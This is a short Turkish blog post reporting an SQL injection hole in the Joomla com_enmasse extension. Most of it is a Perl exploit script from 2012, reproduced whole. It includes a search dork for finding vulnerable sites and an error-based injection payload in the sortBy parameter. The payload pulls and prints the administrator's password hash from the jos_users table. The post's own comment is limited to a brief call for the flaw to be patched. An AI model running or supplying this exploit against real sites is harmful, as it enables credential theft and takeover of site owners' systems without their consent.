Joomla com_enmasse SQL injection Açığı

Joomla com_enmasse eklentisinde SQL injection Açığı bulundu. Bilindiği üzere joomlanın eklentilerinin çok büyük bölümünde SQL injection açığı bulunmuştu. Görüldüğü gibi halen daha eklentilerde sql injection açıkları bulunmaya devam ediliyor. SQL injetion ve perl exploit. Bir an önce kapatılması gerekir.

____________________________________________________________

#!/usr/bin/perl -w

 

########################################

# Exploit Title: Joomla com_enmasse Remote Exploit

#

# Dork: inurl:index.php?option=com_enmasse

#

# Date: [06-08-2012]

#

# Author: Daniel Barragan “D4NB4R”

#

# Twitter: @D4NB4R

#

# site: http://poisonsecurity.wordpress.com/

#

# Vendor: http://www.matamko.com/

#

# Version: 1.2.0.4 (last update on Jul 27, 2012)

#

# License: Enmasse 6 Months Support & Subscription –  USD$358.20

#

# Demo: http://www.matamko.com/products/filexpress/live-demo.html

#

# Tested on: [Linux(bt5)-Windows(7ultimate)]

#

# Gretz: r0073r, indoushka, Ksha, Devboot, pilotcast, shine, aku, navi, dedalo etc….

########################################

 

print “\t\t\n\n”;

print “\t\n”;

print “\t            Daniel Barragan  D4NB4R                \n”;

print “\t                                                   \n”;

print “\t        Joomla com_enmasse Remote Exploit \n”;

print “\t\n\n”;

 

use LWP::UserAgent;

print “\nIngrese el Sitio:[http://wwww.site.com/path/]: “;

 

chomp(my $target=<STDIN>);

 

$concatene=”concat(password)”;

$table=”jos_users”;

$d4nb4r=”floor”;

$com=”com_enmasse”;

$seleccione=”select”;

 

 

$b = LWP::UserAgent->new() or die “Could not initialize browser\n”;

$b->agent(‘Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)’);

 

$host = $target . “index.php?categoryId=1&controller=deal&keyword=1&locationId=1&option=”.$com.”&sortBy=117 and(“.$seleccione.” 1 from(“.$seleccione.” count(*),concat((“.$seleccione.” (“.$seleccione.” (“.$seleccione.” “.$concatene.” from “.$table.” Order by username limit 0,1) ) from `information_schema`.tables limit 0%2C1)%2C”.$d4nb4r.”(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1″;

 

$res = $b->request(HTTP::Request->new(GET=>$host));

$answer = $res->content; if ($answer =~/([0-:a-fA-F]{32})/)  {

 

print “\n Hash Admin : $1\n\n”;

print ” El exploit fue exitoso si desea ver mas datos modifique el script\n”;

print ” The exploit was successful if you want to see more data modify the script\n”;

 

}

else{print “\n[-] No se pudo, intente manualmente\n”;}

 

#####Daniel Barragan D4NB4R 2012################

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir